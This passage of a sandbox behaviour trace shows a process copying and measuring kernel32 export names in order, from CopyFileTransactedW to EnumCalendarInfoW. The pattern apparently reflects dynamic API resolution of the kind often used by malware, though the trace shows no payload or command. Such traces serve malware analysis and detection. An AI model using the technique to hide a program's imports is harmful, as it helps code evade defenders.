lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.687] lstrlenA (lpString="COPYFILEW") returned 9 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.687] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.687] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.687] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.687] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.687] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.687] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.687] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.687] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.687] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.687] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.688] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.688] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.688] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.688] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.688] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.688] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.688] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.688] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.688] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.688] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.688] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.688] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.688] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.688] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.688] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.688] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.688] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.689] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.689] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.689] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.689] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.689] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.689] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.689] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.689] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.689] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.689] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.689] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.689] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.689] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.689] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.689] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.689] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.690] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.690] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.690] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.690] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.690] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.690] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.690] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.690] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.690] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.690] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.690] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.690] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.690] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.690] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.690] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.690] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.690] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.690] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.691] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.691] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.691] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.691] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.691] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.691] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.691] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.691] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.691] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.691] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.691] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.691] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.691] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.691] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.691] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.691] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.691] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.692] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.692] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.692] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.692] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.692] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.692] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.692] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.692] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.692] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.692] lstrlenA (lpString="DELETEATOM") returned 10 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.692] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.692] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.692] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.692] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.692] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.692] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.692] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.692] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.693] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.693] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.693] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.693] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.693] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.693] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.693] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.693] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.693] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.693] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.693] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.693] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.693] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.693] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.693] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.693] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.693] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.694] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.694] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.694] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.694] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.694] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.694] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.694] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.694] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.694] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.694] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.694] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.694] lstrcpyA (in: 